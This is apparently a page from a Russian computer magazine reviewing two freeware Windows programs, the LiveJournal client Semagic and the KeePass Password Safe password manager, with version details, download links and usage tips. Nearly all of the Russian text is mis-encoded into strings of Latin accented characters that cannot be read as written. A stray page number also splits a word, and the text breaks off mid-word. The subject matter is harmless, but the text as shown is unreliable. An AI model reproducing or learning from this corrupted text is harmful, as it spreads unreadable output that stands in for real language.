Semagic Âåðñèÿ: 1.5.5.6 îò 22.11.2005 Îïåðàöèîííàÿ ñèñòåìà: Windows 98, Me, NT, 2000, XP Ðàñïðîñòðàíåíèå: áåñïëàòíî Ðàçìåð: 766 Êá Ñêà÷àòü: http://semagic.sourceforge.net Åñëè òû ïîëüçóåøüñÿ òàêèì íåïðîñòûì ñåðâèñîì, êàê livejournal.com (ìû âîò ïîëüçóåìñÿ, à ïî÷èòàòü è íàïèñàòü ïðî X-CREW ìîæíî çäåñü: www.livejournal.com/community/x_crew), òî ñëûøàë ïðî êëèåíòà äëÿ LJ ïîä íàçâàíèåì Semagic. Åñëè íå ñëûøàë, òî çíàé, ÷òî Semagic — ïîëíîöåííûé öåíòð óïðàâëåíèÿ òâîèì æóðíàëîì. Òåêñòîâûé ðåäàêòîð ñ õòìë è âèçèâèãîì, ìåíåäæåðîì çàïèñåé, êàðòèíêàìè, êàëåíäàðåì, ðåìàéíäåð-íàïîìèíàòåëåì, òàê ÷òî Semagic — òîëêîâî ïðîäóìàííûé ïðîäóêò. Ðóññêèé ÿçûê ïîääåðæèâàåò. Îðôîðãðàôèþ ïðîâåðÿòü óìååò, ïðîâåðî÷íûé ñëîâàòü ïîäêëþ÷àåò, âñå ïîìíèò, çàìå÷àåò, à ïîëüçîâàòåëü â LJ íå ñêó÷àåò :).

KeePass Password Safe Âåðñèÿ: 1.03 îò 10.09.2005 Îïåðàöèîííàÿ ñèñòåìà: Windows 98, Me, NT, 2000, XP, 2003 Server Ðàñïðîñòðàíåíèå: áåñïëàòíî Ðàçìåð: 837 Êá Ñêà÷àòü: http://keepass.sourceforge.net Êàêîé ó òåáÿ ïàðîëü íà ñèñòåìó? À íà äîñòóï â Èíòåðíåò? À íà ïî÷òó? Åñëè â òâîåé ãîëîâå ñåé÷àñ ïðîçâó÷àëî «qwerty», «123» èëè «god», òî çíàåøü èõ íå òîëüêî òû, íî è ÿ. Íåò-íåò, ÿ íå ñòàíó ÷èòàòü òåáå ëåêöèþ î áåçîïàñíîñòè è ïðàâèëüíîñòè âûáîðà ïàðîëÿ, à ëó÷øå äîâåðèì âñå ýòî çàìå÷àòåëüíîé óòèëèòå KeePass Password Safe. Äîñòàòî÷íî çàïîìíèòü òîëüêî îäèí ïàðîëü (master key), ÷òîáû âñåãäà èìåòü äîñòóï êî âñåì îñòàëüíûì. Íåñìîòðÿ íà íåáîëüøîé ðàçìåð, ïðîãðàììêà ýòà î÷åíü ôóíêöèîíàëüíà è óäîáíà â ðàáîòå, äàæå èêîíêè ñîçäàòåëè ñäåëàëè ñàìè. Ïîñëå óñòàíîâêè è ñîçäàíèÿ áàçû äëÿ õðàíåíèÿ çàâåòíûõ ïàðîëåé íå çàáóäüòå ñîõðàíèòü êîïèþ ôàéëà â íàäåæíîì ìåñòå (ïàðàíîèêàì — â äâóõ ìåñ-

148

òàõ). Òåïåðü ìîæíî äîáàâèòü ïåðâóþ çàïèñü, ïîìåñòèòü åå â íóæíóþ ãðóïïó èëè ñîçäàòü ñâîþ. Âûäóìûâàòü, êðîìå ñâîåãî ëîãèíà, íè÷åãî íå ïðèäåòñÿ: âñå ñäåëàþò çà òåáÿ, à èíäèêàòîð ïîêàæåò óñòîé÷èâîñòü ïàðîëÿ. Òåïåðü íàì íå ñòðàøåí áðóòôîðñ. Ââîäèòñÿ ïàðîëü â íóæíîå íàì ïîëå õèòðî: ñíà÷àëà åãî íóæíî ñäåëàòü àêòèâíûì (ïîìåñòèòü òóäà êóðñîð), çàòåì âûáðàòü â KeePass íóæíóþ çàïèñü è èñïîëüçîâàòü êîìáèíàöèþ êëàâèø Ctrl+V. Âîò è âñå! À äëÿ èñêóøåííûõ ïîëüçîâàòåëåé èìååòñÿ âûáîð àëãîðèòìà øèôðîâàíèÿ áàçû ñ ïàðîëÿìè, èìïîðò è ýêñïîðò, ïîääåðæêà ïëàãèíîâ è äàæå ïîääåðæêà ìàêðîñîâ. Ïîïðîáîâàòü ïðîñòåéøèé ìîæíî, âáèâ â ïîëå Notes ñëåäóþùåå: Auto-Type: {PASSWORD}{ENTER}. ×óòü íå çàáûë ñêàçàò